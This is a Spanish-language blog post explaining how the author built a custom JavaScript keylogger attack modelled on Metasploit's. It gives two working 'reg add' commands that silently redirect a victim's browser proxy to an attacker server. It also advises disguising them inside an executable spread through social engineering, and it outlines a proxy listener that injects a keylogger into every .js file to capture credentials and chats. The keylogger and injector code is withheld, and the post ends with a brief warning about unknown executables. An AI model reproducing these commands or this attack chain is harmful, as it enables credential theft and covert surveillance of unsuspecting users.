Keylogger hecho en Javascript

Posted on 20/05/2012

1



En esta oportunidad se me ocurrió hacer una nueva versión personalizada del Javascript Keylogger de Metasploit. Como sabrán Metasploit te permite hacer este ataque desde su entorno, lo malo que no te da posibilidad de crear tus propios vectores de ataque. Así que hice el siguiente experimento configure 2 servidores diferentes, un servidor proxy y un servidor de aplicaciones con base de datos.

Como funciona?

Primero: se crea un ejecutable ya sea en cualquier lenguaje, de preferencia vb6 por su compatibilidad con todas las versiones de Windows. Este ejecutable lo único que hará sera, cambiar el proxy de tu Internet Explorer o de cualquier navegador que estés usando.

reg add “HKU\SID\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v ProxyEnable /t REG_DWORD /d 1 /f
reg add “HKU\SID\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v ProxyServer /t REG_SZ /d “IP:PUERTO” /f

Estas son sentencias en .bat lo único que harás sera llamarlo desde tu ejecutable camuflando luego lo que quieras que haga, para que la victima no sospeche de nada. En la IP va la dirección de tu servidor Proxy y el puerto por donde esta corriendo.

Una vez que ya tengas el ejecutable, utilizas las redes sociales o la ingeniería social para distribuirlo.

Segundo: una vez que la victima haya ejecutado el programa, todas sus comunicaciones vía HTTP y HTTPS, pasaran primero por el Proxy, donde existe un Listener que donde vea archivos *.js los descarga y agrega un payload, este payload contiene un javascript keylogger, luego devuelve el mismo *.js con el código malisioso a la victima.

Tercero: la victima ya tiene el *.js original de la pagina mas el código malicioso, la funcionalidad de la pagina no se ve afectada en nada, así que cada vez que la victima digite algo dentro de la pagina, ya sea sus credenciales, correo electrónicos, chats, etc. estos viajaran  a otro servidor para luego poder visualizarlo.

Cuarto: el delincuente informático, tiene un panel de control donde puede visualizar todo lo digitado de sus victimas de una manera fácil e interactiva.

En realidad el corazón de este ataque esta en el servidor proxy, donde se encuentra el listener esperando la llegada de cualquier archivo *.js, lo demás son valores agregados que se le da para una mejor calidad en el ataque.

No coloco, los algoritmos que se están usando tanto en el javascript como en el listener del servidor proxy, por motivos que aun existen vulnerabilidades tanto en Chrome, Firefox, Internet Explorer, Opera, etc, y en sus versiones mas actualizadas. Así que esto podría ser muy perjudicial hasta el momento.

Recomendaciones

Solo una recomendación, no descargues ningún archivo o ejecutes programas o ejecutables que desconozcas de sus orígenes.

Aquí te dejo un vídeo de como esta funcionando este proyecto:

Anuncios